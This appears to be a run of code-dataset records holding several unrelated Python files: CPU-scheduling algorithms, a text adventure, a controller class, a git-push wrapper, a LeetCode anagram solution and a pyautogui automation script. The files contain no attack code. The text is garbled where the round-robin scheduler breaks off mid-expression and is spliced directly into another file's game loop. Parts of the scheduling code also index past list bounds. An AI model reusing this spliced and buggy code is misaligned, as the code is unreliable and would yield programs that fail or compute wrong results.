number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done number\\n\")\r\ndef Prioinput(ProcessID, ArrivalTime, BurstTime, Priority):\r\n Mat[ProcessID - 1][0] = temp[ProcessID - 1][0] = ProcessID\r\n Mat[ProcessID - 1][1] = temp[ProcessID - 1][1] = ArrivalTime\r\n Mat[ProcessID - 1][2] = temp[ProcessID - 1][2] = BurstTime\r\n Mat[ProcessID - 1][3] = temp[ProcessID - 1][3] = Priority\r\n\r\n print(Mat[ProcessID - 1])\r\ndepsum = 0\r\ncurrent_running = []\r\ndef preemptive_priority(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 3))\r\n m_sum = 0\r\n for i in range(0, processesNumber):\r\n m_sum = m_sum + Mat[i][2]\r\n if i==processesNumber-1:\r\n if temp[i][1]> temp[i-1][1]+m_sum:\r\n m_sum = temp[i+1][1] -temp[i][1]\r\n else:\r\n if temp[i+1][1]> temp[i][1]+m_sum:\r\n m_sum = temp[i+1][1] -temp[i][1]\r\n depsum = m_sum\r\n\r\n waiting = []\r\n first = Mat[0]\r\n for i in range(0, processesNumber):\r\n if Mat[i][1] == first[1]:\r\n if Mat[i][3] < first[3]:\r\n first = Mat[i]\r\n\r\n current_running.append(first[0])\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n Mat[i][2] = Mat[i][2] - 1\r\n if Mat[i][2] == 0:\r\n del Mat[i]\r\n break\r\n m_sum = m_sum - 1\r\n start = 1\r\n\r\n\r\n\r\n for i in range(0 ,m_sum):\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] <= start:\r\n waiting.append(Mat[j])\r\n if len(waiting) == 0:\r\n if Mat[j][1] != start:\r\n current_running.append(\"IDLE\")\r\n\r\n else:\r\n first = Mat[0]\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] == first[1]:\r\n if Mat[j][3] < first[3]:\r\n first = Mat[j]\r\n current_running.append(first[0])\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n else:\r\n first = waiting[0]\r\n for j in range(0, len(waiting)):\r\n if waiting[j][3] < first[3]:\r\n first = waiting[j]\r\n waiting.clear()\r\n\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n current_running.append(first[0])\r\n\r\n m_sum = m_sum - 1\r\n start = start + 1\r\n\r\n current_running\r\n\r\ndef averagetime(processesNumber):\r\n waittime = []\r\n bursttime = []\r\n departure = []\r\n burst = 0\r\n firsttime = 0\r\n firstArrived = current_running[0]\r\n print(firstArrived)\r\n for i in range(0, len(temp)):\r\n if temp[i] == firstArrived:\r\n firsttime = temp[i][1]\r\n print(firsttime)\r\n for i in range(0, len(temp)):\r\n indexpos = 0\r\n indexPoslist = []\r\n prearrival.append(temp[i][1])\r\n bursttime.append(temp[i][2])\r\n for j in range(0, temp[i][2]):\r\n indexpos = current_running.index(temp[i][0], indexpos)\r\n indexPoslist.append(indexpos)\r\n indexpos += 1\r\n if i == 0:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1)\r\n else:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1 + firsttime)\r\n if prearrival[i] > prearrival[i-1] + bursttime[i-1]:\r\n waittime.append(0)\r\n else:\r\n waittime.append(departure[i] - prearrival[i] - bursttime[i])\r\n tim = 0\r\n for i in range(len(waittime)):\r\n tim = tim + waittime[i]\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n\r\n\r\n############################################################### FCFS ####################################\r\nMat = []\r\ndef FCFSprocessCreate(processesNumber):\r\n number_of_columns = 3 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done number\\n\")\r\ndef FCFS_input(name, ArrivalTime, BurstTime):\r\n Mat[name - 1][0] = name\r\n Mat[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = BurstTime\r\n\r\n print(Mat[name - 1])\r\n\r\n\r\nFCcurrent_running = []\r\nFCrunning = []\r\nProcessArrival = []\r\n\r\ndef FCFSburst(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n bursteach = []\r\n for i in range(len(ProcessArrival)):\r\n bursteach.append(ProcessArrival[i][2])\r\n return bursteach\r\n\r\ndef FCFS(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n for i in range(len(ProcessArrival)):\r\n if ProcessArrival[i][1] > ProcessArrival[i-1][1]+ProcessArrival[i-1][2]:\r\n FCcurrent_running.append(\"IDLE\")\r\n else:\r\n FCcurrent_running.append(\"P\" + str(ProcessArrival[i][0]))\r\n return FCcurrent_running\r\n\r\n\r\n\r\ndef FCaverage(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n arrival = []\r\n bursttime = []\r\n departure = []\r\n waittime = []\r\n dsum = 0\r\n\r\n for i in range(len(ProcessArrival)):\r\n arrival.append(ProcessArrival[i][1])\r\n bursttime.append(ProcessArrival[i][2])\r\n departure.append(ProcessArrival[i][2] + dsum)\r\n dsum = departure[i]\r\n tim = 0\r\n for i in range(processesNumber):\r\n tim = tim + (departure[i]-bursttime[i]-arrival[i])\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n\r\n\r\n\r\ndef FCreturnLeave(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n arrival = []\r\n bursttime = []\r\n departure = []\r\n dsum = 0\r\n for i in range(len(ProcessArrival)):\r\n arrival.append(ProcessArrival[i][1])\r\n bursttime.append(ProcessArrival[i][2])\r\n departure.append(ProcessArrival[i][2] + dsum)\r\n dsum = departure[i]\r\n\r\n return departure\r\n\r\n############################################# preemptive SJF #######################################\r\n\r\nglobal PreSJFtemp\r\nPreSJFtemp = []\r\nglobal SJprecurrent_running\r\nSJprecurrent_running = []\r\nMat = []\r\nglobal SJFprearrival\r\nSJFprearrival = []\r\ndef processCreate(processesNumber):\r\n number_of_columns = 3 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n PreSJFtemp.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n PreSJFtemp[i].append(j)\r\n PreSJFtemp[i][j] = 0\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done Number\\n\")\r\n\r\ndef pre_sjf_input(name, ArrivalTime, BurstTime):\r\n Mat[name - 1][0] = PreSJFtemp[name - 1][0] = name\r\n Mat[name - 1][1] = PreSJFtemp[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = PreSJFtemp[name - 1][2] = BurstTime\r\n\r\n print(Mat[name - 1])\r\n\r\n\r\n\r\n\r\ndef preemptive_sjf(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 2))\r\n m_sum = 0\r\n for i in range(0, processesNumber):\r\n m_sum = m_sum + Mat[i][2]\r\n if i==processesNumber-1:\r\n if PreSJFtemp[i][1] > PreSJFtemp[i-1][1]+m_sum:\r\n m_sum = PreSJFtemp[i+1][1] -PreSJFtemp[i][1]\r\n else:\r\n if PreSJFtemp[i+1][1] > PreSJFtemp[i][1]+m_sum:\r\n m_sum = PreSJFtemp[i+1][1] - PreSJFtemp[i][1]\r\n waiting = []\r\n first = Mat[0]\r\n for i in range(0, processesNumber):\r\n if Mat[i][1] == first[1]:\r\n if Mat[i][2] < first[2]:\r\n first = Mat[i]\r\n\r\n SJprecurrent_running.append(first[0])\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n Mat[i][2] = Mat[i][2] - 1\r\n if Mat[i][2] == 0:\r\n del Mat[i]\r\n break\r\n m_sum = m_sum - 1\r\n start = 1\r\n\r\n for i in range(0, m_sum):\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] <= start:\r\n waiting.append(Mat[j])\r\n if len(waiting) == 0:\r\n if Mat[j][1] != start:\r\n SJprecurrent_running.append(\"IDLE\")\r\n else:\r\n first = Mat[0]\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] == first[1]:\r\n if Mat[j][2] < first[2]:\r\n first = Mat[j]\r\n SJprecurrent_running.append(first[0])\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n else:\r\n first = waiting[0]\r\n for j in range(0, len(waiting)):\r\n if waiting[j][2] < first[2]:\r\n first = waiting[j]\r\n waiting.clear()\r\n\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n SJprecurrent_running.append(first[0])\r\n m_sum = m_sum - 1\r\n start = start + 1\r\n\r\n\r\n\r\n\r\ndef SJaveragetime(processesNumber):\r\n waittime = []\r\n bursttime = []\r\n departure = []\r\n burst = 0\r\n firsttime = 0\r\n firstArrived = SJprecurrent_running[0]\r\n print(firstArrived)\r\n for i in range(0, len(PreSJFtemp)):\r\n if PreSJFtemp[i] == firstArrived:\r\n firsttime = PreSJFtemp[i][1]\r\n print(firsttime)\r\n for i in range(0, len(PreSJFtemp)):\r\n indexpos = 0\r\n indexPoslist = []\r\n SJFprearrival.append(PreSJFtemp[i][1])\r\n bursttime.append(PreSJFtemp[i][2])\r\n for j in range(0, PreSJFtemp[i][2]):\r\n indexpos = SJprecurrent_running.index(PreSJFtemp[i][0], indexpos)\r\n indexPoslist.append(indexpos)\r\n indexpos += 1\r\n if i == 0:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1)\r\n else:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1 + firsttime)\r\n if SJFprearrival[i] > SJFprearrival[i - 1] + bursttime[i - 1]:\r\n waittime.append(0)\r\n else:\r\n waittime.append(departure[i] - SJFprearrival[i] - bursttime[i])\r\n tim = 0\r\n for i in range(len(waittime)):\r\n tim = tim + waittime[i]\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n#################################### non-preemptive priority ##########################################\r\nMat = []\r\nwaitingList = []\r\nstartingList = []\r\nglobal currentRunning\r\ncurrentRunning = []\r\nglobal GanttInformation\r\nGanttInformation = []\r\nxcurrent_running = []\r\ndef NonPrioprocessCreate(processesNumber):\r\n number_of_columns = 4 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n\r\n for i in range(0, processesNumber):\r\n waitingList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n waitingList[i].append(j)\r\n waitingList[i][j] = 0\r\n for i in range(0, processesNumber):\r\n startingList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n startingList[i].append(j)\r\n startingList[i][j] = 0\r\n\r\n for i in range(0, processesNumber):\r\n GanttInformation.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n GanttInformation[i].append(j)\r\n GanttInformation[i][j] = 0\r\n print(\"Done number\\n\")\r\n\r\nwaitingList.clear()\r\nstartingList.clear()\r\n\r\ndef NonPrioinput(name, ArrivalTime, BurstTime, Priority):\r\n Mat[name - 1][0] = name\r\n Mat[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = BurstTime\r\n Mat[name - 1][3] = Priority\r\n\r\n print(Mat[name - 1])\r\n\r\ncurrent_running = []\r\n\r\ndef nonpreemptive_priority(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 3))\r\n arrival = 0 # initialize minimum arrival time\r\n priority = Mat[0][3] # initialzie priority to that of first process in order\r\n currentProcess = Mat[0] # initailize process to the first process\r\n\r\n startingList = []\r\n postedlist = []\r\n count = 0\r\n index = 0\r\n # check for the same arrival time at 0\r\n for i in range(1, len(Mat)):\r\n if Mat[i][1] == 0:\r\n startingList.append(Mat[i])\r\n if len(startingList) == 0:\r\n currentRunning.append(currentProcess)\r\n Burst = Mat[0][2] # initialize burst time as a variable\r\n BurstCount = Mat[0][2]\r\n del Mat[0] # Remove first process from qeueu\r\n while len(Mat) != 0:\r\n waitingList = []\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n\r\n index = i\r\n\r\n if len(waitingList) == 0:\r\n Burst = Mat[index][1]\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n else:\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n\r\n else:\r\n startingList.append(Mat[0])\r\n for i in range(0, len(startingList)):\r\n if Mat[i][3] < priority:\r\n currentProcess = Mat[i]\r\n priority = Mat[i][3]\r\n currentRunning.append(currentProcess)\r\n Burst = currentProcess[2] # initialize burst time as a variable\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == currentProcess:\r\n del Mat[i]\r\n break\r\n # Remove first process from qeueu\r\n while len(Mat) != 0:\r\n waitingList = []\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n count = count + 1\r\n index = i\r\n if count == 0:\r\n Burst = Mat[index][1]\r\n for i in range(0, len(Mat)):\r\n if Mat[i][1] <= Burst:\r\n waitingList.append(Mat[i])\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n else:\r\n first = waitingList[0]\r\n for i in range(0, len(waitingList)):\r\n\r\n if waitingList[i][3] < first[3]:\r\n first = waitingList[i]\r\n elif waitingList[i][3] == first[3]:\r\n if waitingList[i][1] < first[1]:\r\n first = waitingList[i]\r\n\r\n if len(waitingList) == 1:\r\n first = waitingList[0]\r\n\r\n currentProcess = first\r\n currentRunning.append(currentProcess)\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n del Mat[i]\r\n break\r\n Burst = Burst + first[2]\r\n for i in range(0, processesNumber):\r\n for j in range(0, 4):\r\n GanttInformation[i][0] = currentRunning[i][0]\r\n GanttInformation[i][1] = currentRunning[i][2]\r\n if i == 0:\r\n\r\n GanttInformation[i][2] = currentRunning[i][1]\r\n GanttInformation[i][3] = currentRunning[i][1] + currentRunning[i][2]\r\n else:\r\n if currentRunning[i][1] <= GanttInformation[i - 1][3]:\r\n GanttInformation[i][2] = GanttInformation[i - 1][3]\r\n GanttInformation[i][3] = GanttInformation[i][2] + GanttInformation[i][1]\r\n else:\r\n GanttInformation[i][2] = currentRunning[i][1]\r\n GanttInformation[i][3] = currentRunning[i][1] + currentRunning[i][2]\r\n PrenonCurrent = []\r\n for i in range(len(currentRunning)):\r\n PrenonCurrent.append(\"P\" + str(currentRunning[i][0]))\r\n\r\n return PrenonCurrent\r\n\r\n\r\ndef Prenonaverage(processesNumber):\r\n sum = 0\r\n for i in range(0, processesNumber):\r\n sum = sum + (GanttInformation[i][3] - currentRunning[i][1] - GanttInformation[i][1])\r\n averageWaitingTime = sum / processesNumber\r\n return averageWaitingTime\r\n\r\n\r\ndef Prenondepart(processesNumber):\r\n departure = []\r\n for i in range(processesNumber):\r\n departure.append(GanttInformation[i][3])\r\n return departure\r\n\r\ndef PrenonBurst(processesNumber):\r\n bursttime = []\r\n for i in range(processesNumber):\r\n bursttime.append(GanttInformation[i][1])\r\n return bursttime\r\n######################################### ROUND ROBIN ############################################\r\n\r\nglobal GChart\r\nGChart = []\r\nglobal RRAvgWaitingTime\r\nRRAvgWaitingTime = 0\r\nglobal RRAvgTurnAroundTime\r\nRRAvgTurnAroundTime = 0\r\nglobal RRdepart\r\nRRdepart = []\r\nPList = []\r\n\r\ndef RR_create(processesNumber):\r\n for i in range(0, processesNumber):\r\n PList.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, 3):\r\n PList[i].append(j)\r\n PList[i][j] = 0\r\n\r\n\r\n print(\"Done Number\\n\")\r\n\r\n\r\ndef RR_input(name, ArrivalTime, BurstTime):\r\n PList[name - 1][0] = name\r\n PList[name - 1][1] = ArrivalTime\r\n PList[name - 1][2] = BurstTime\r\n print(PList)\r\n\r\n\r\ndef shiftCL(alist): # circular shift left fn: to rearrange queue\r\n temp = alist[0]\r\n for i in range(len(alist)-1):\r\n alist[i] = alist[i+1]\r\n alist[len(alist)-1] = temp\r\n return alist\r\n\r\n\r\ndef RR(TQ, n): # time quantum, processes list, number of processes\r\n\r\n q = TQ # time quantum\r\n TotalBT = 0\r\n time = 0 # current time\r\n AP = 0 # arrived processes\r\n RP = 0 # ready processes\r\n DP = 0 # done processes\r\n TotalCT = 0\r\n start = 0\r\n TotalAT = 0\r\n # lists of AT and BT\r\n # waiting queue\r\n CTList = [] # complition time\r\n\r\n ATList = [] # arrival time\r\n\r\n BTList = [] # burst time\r\n queue = []\r\n a = 0\r\n\r\n while a < n:\r\n ATList.append(PList[a][1])\r\n BTList.append(PList[a][2])\r\n a += 1\r\n\r\n while(DP < n):\r\n for i in range (AP, n):\r\n if (time>= PList[i][1]):\r\n queue.append(PList[i])\r\n AP+=1\r\n RP+=1\r\n\r\n# if no process come or alla processes finished\r\n if (RP < 1):\r\n GChart.append(0)\r\n time += 1\r\n continue\r\n # shift\r\n if (start): # if first quantum time is done\r\n queue = shiftCL(queue)\r\n\r\n if (queue[0][2] > 0):\r\n if (queue[0][2] > q):\r\n for g in range(time, time+q):\r\n GChart.append(queue[0][0])\r\n time += q\r\n queue[0][2] -= q\r\n\r\n else: # if process burst <= quantum\r\n for g in range(time, time+queue[0][2]):\r\n GChart.append(queue[0][0])\r\n time += queue[0][2]\r\n CTList.append(time) # add to complition time list\r\n queue[0][2] = 0\r\n DP += 1\r\n RP -= 1\r\n start = 1\r\n\r\n o = 0\r\n while o 0:\n pickup = input(\"hey! there's something here. pick it up?\")\n if pickup == \"yes\":\n print(\"you picked the item. move now.\")\n print(\"this is what you have:\")\n player.inventory = player.inventory + player.current_location.items\n player.print_inventory()\n if pickup == \"no\":\n print(\"you refuse to pick up the item. move on\")\n command = input(\">_\")\n '''if command.lower() in short_directions:\n pos = short_directions.index(command.lower()'''\n if [LB, JC, JB, JH, JL] in player.inventory:\n print(\"Oh wow! you actually found all the items. congrats! now go back home you've wasted enough\"\n \" time here\")\n playing = False\n if command.lower() in ['give up']:\n print(\"you give up and pass the game. not only did you give up but you cheated\"\n \" and gained nothing in return. good job degenerate\")\n playing = False\n if command.lower() in ['attack']:\n print(\" you're too much of a little wimp to actually attack my dude, this is the reason\"\n \" why karen left you, and she took the kids\")\n\n if command.lower() in ['q', 'quit', 'exit']:\n playing = False\n elif command.lower() in directions:\n try:\n room_name = getattr(player.current_location, command)\n room_object = globals()[room_name]\n\n player.move(room_object)\n except KeyError:\n print(\"this key no exist\")\n\n else:\n print(\"command not recognized\")","sub_path":"notes/world map OOPS-Tuna.py","file_name":"world map OOPS-Tuna.py","file_ext":"py","file_size_in_byte":14558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"600859556","text":"from src.controller.navbar import Navbar\nfrom src.controller.student import Student\nfrom src.controller.activity import Activity\n\n\nclass Controller:\n\n def __init__(self):\n self.view = None\n self.model = None\n\n self.navbar = None\n self.student = None\n self.activity = None\n\n def start(self, model, view):\n self.view = view\n self.model = model\n\n self.navbar = Navbar(controller=self)\n self.student = Student(controller=self)\n self.activity = Activity(controller=self)\n\n self.view.start()\n\n def raffle_button(self, defs={}):\n error, student, activity = self.model.raffle(defs=defs)\n\n if error:\n self.view.create_error_window(error=error)\n return\n\n self.view.create_raffle_window(\n student=student, activity=activity['title'])\n","sub_path":"src/controller/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"192305343","text":"#!/usr/bin/env python3\n# PYTHON_ARGCOMPLETE_OK\nfrom gcommand import Command\nimport sys\n\n\nclass PushCommand(Command):\n aliases = ['push']\n\n def run(self):\n cb = self.repo.head.shorthand\n if len(self.args) == 0:\n self.exec('git push origin %s' % (cb))\n elif len(self.args) == 1 and self.args[0] == '-f':\n self.exec('git push origin %s -f' % (cb))\n else:\n self.exec('git push %s' % (' '.join([('\"'+v+'\"' if ' ' in v else v) for v in self.args])))\n\n def getAutocompleteArgs(self, **kwargs):\n return ['-f']\n\n\nif __name__ == '__main__':\n c = PushCommand(sys.argv[1:])\n c.run()\n sys.exit(c.statuscode)","sub_path":"gpush.py","file_name":"gpush.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"520692034","text":"class Vector:\n # initializing\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return \"{}({}, {})\".format(\n self.__class__.__name__, self.x, self.y\n )\n\n\n# creating an instance of out Vector class\nvector = Vector(4, 9)\nprint(dir(Vector))\n\n# exploring __dict__ method\nprint(vector.__dict__)\nprint(vector.__dict__['x'], vector.__dict__['y'])\n\n# using __dict__ methods\nprint(getattr(vector, 'y'))\nprint(hasattr(vector, 'x'))\n","sub_path":"Python notes and examples/Code examples for advanced topics (metaclasses, abc, descriptors and etc)/test five.py","file_name":"test five.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"406843199","text":"# pylint: disable=all\n\"\"\"\n242. 有效的字母异位词\n给定两个字符串 s 和 t ,编写一个函数来判断 t 是否是 s 的字母异位词。\n\n示例 1:\n\n输入: s = \"anagram\", t = \"nagaram\"\n输出: true\n示例 2:\n\n输入: s = \"rat\", t = \"car\"\n输出: false\n说明:\n你可以假设字符串只包含小写字母。\n\n进阶:\n如果输入字符串包含 unicode 字符怎么办?你能否调整你的解法来应对这种情况?\n\"\"\"\n# 1. 暴力 sorted --> 排序后是否相等 O(nlog(n))\n# 2. hash map --> 统计每个字符出现的频次\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n return sorted(s) == sorted(t)\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n dict1 = {}\n for i in s:\n dict1[i] = dict1.get(i, 0) + 1\n dict2 = {}\n for i in t:\n dict2[i] = dict2.get(i, 0) + 1\n return dict1 == dict2\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n hash_table1, hash_table2 = [0] * 26, [0] * 26\n for i in s:\n hash_table1[ord(i) - ord(\"a\")] += 1\n for j in t:\n hash_table2[ord(j) - ord(\"a\")] += 1\n return hash_table1 == hash_table2\n","sub_path":"Week_02/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"427439026","text":"import glob\nimport json\nimport os\nimport re\n\ndef make(prefix, filename):\n data = {}\n data[\"prefix\"] = prefix\n data[\"body\"] = []\n for s in open(filename):\n s = re.sub(\"\\n\", \"\", s)\n data[\"body\"].append(s)\n return data\n\nresult = {}\n\nwith open(\"./template.cpp\") as f:\n prefix = \"cpt\"\n result[prefix] = make(prefix, \"./template.cpp\")\n\nfor file in glob.glob(\"./templates/*.cpp\"):\n prefix = os.path.basename(file).split(\".\")[0]\n result[prefix] = make(prefix, file)\n\nwith open(\"./cpp.json\", \"w\") as f:\n f.write(json.dumps(result, indent=2))\n","sub_path":"vscode/make_snippet.py","file_name":"make_snippet.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"322220285","text":"class Solution(object):\n def getModifiedArray(self, length, updates):\n \"\"\"\n :type length: int\n :type updates: List[List[int]]\n :rtype: List[int]\n \"\"\"\n results = [0]*(length+1)\n for start, end, inc in updates:\n results[start] += inc\n results[end+1] -= inc\n \n for i in range(1, length+1):\n results[i] += results[i-1]\n return results[:length]","sub_path":"1010.PairsofSongsWithTotalDurationsDivisibleby60.py","file_name":"1010.PairsofSongsWithTotalDurationsDivisibleby60.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"43831195","text":"import time\nimport os\nimport shutil\nimport re\nimport winsound\nfrom Common import *\nfrom loguru import logger\nfrom write_logging import Date_Time\nfrom Init import All_Init\nimport pyautogui as png\nimport random\nimport cv2 as cv\nfrom utils.baidu_ocr import get_text_by_img\nfrom write_file_png import Image_Process\nimage_stances = Image_Process()\nos.chdir(HOME_DIR)\n\ndef make_wrapper(func):\n def wrapper(*args, **kwargs):\n args_list = list(args)\n new_args = []\n for i, item in enumerate(args_list):\n if i in [1, 3]:\n new_args.append(item+41) # +58是自动化 +50标签栏 -41firefox +17benren \n else:\n new_args.append(item)\n func(*new_args)\n return wrapper\n\n@make_wrapper\ndef save_picture(x1, y1, x2, y2, user_dir, name):\n \"\"\"\n 截图保存功能,默认保存在self.user_dir\n :param x1:\n :param y1:\n :param x2:\n :param y2:\n :param name: 图片名称\n :return:\n \"\"\"\n mouse_click(1350, 900)\n assert isinstance(name, str)\n image_stances.save_png(image_stances.shoot_png(x1, y1, x2, y2), user_dir, name)\n time.sleep(1)\n\n\n@make_wrapper\ndef mouse_click(x1, y1):\n png.moveTo(x1, y1, duration=1)\n png.click()\n time.sleep(1)\n\n\n@make_wrapper\ndef pull_mouse(x1, y1, x2, y2):\n \"\"\"拖动\"\"\"\n png.moveTo(x1, y1, duration=1)\n png.dragTo(x2, y2, duration=3)\n\n\ndef mouse_click_and_input_content(x, y, content):\n \"\"\"\n 点击输入框并输入内容\n :param x:\n :param y:\n :param content:\n :return:\n \"\"\"\n mouse_click(x, y)\n input_content(content)\n\n\ndef much_mouse_click(x1, y1, count, time_length=10):\n for i in range(count):\n time.sleep(time_length)\n mouse_click(x1, y1)\n time.sleep(10)\n\n\ndef input_content(number_str):\n \"\"\"\n 写入输入框\n :param number_str: 156.62\n :return: Null\n \"\"\"\n time.sleep(1)\n for i in number_str:\n time.sleep(0.5)\n png.press(i)\n time.sleep(2)\n\n\ndef choose_to_rent(x1, y1):\n \"\"\"\n 点击子选项+租赁选项\n :param x1:\n :param y1:\n :return:\n \"\"\"\n mouse_click(x1, y1)\n time.sleep(1)\n mouse_click(1133, 606)\n\ndef choose_to_buy(x1, y1):\n \"\"\"\n 点击子选项 + 购买选项\n :param x1:\n :param y1:\n :return:\n \"\"\"\n mouse_click(x1, y1)\n time.sleep(1)\n mouse_click(1133, 577)\n # todo:待定 mouse_click()\n\ndef resource_chose_rent():\n \"\"\"选择租赁\"\"\"\n # 生成随机值\n flag_number = random.randint(1, 3)\n # Step1:硬件资源配置\n mouse_click(720, 488)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n choose_to_rent(870, 590)\n choose_to_rent(870, 640)\n # Step2:软件资源配置\n mouse_click(720, 540)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n # Step3:网络资源配置\n mouse_click(720, 590)\n choose_to_rent(870, 488)\n choose_to_rent(870, 540)\n choose_to_rent(870, 590)\n choose_to_rent(870, 640)\n # Step4:运营资源配置\n mouse_click(720, 640)\n mouse_click(870, 490) # 4.1计算\n choose_to_rent(1020, 492)\n choose_to_rent(1020, 532)\n choose_to_rent(1020, 568)\n mouse_click(870, 520) # 4.2数据库\n choose_to_rent(1022, 492)\n choose_to_rent(1022, 531)\n choose_to_rent(1022, 570)\n choose_to_rent(1022, 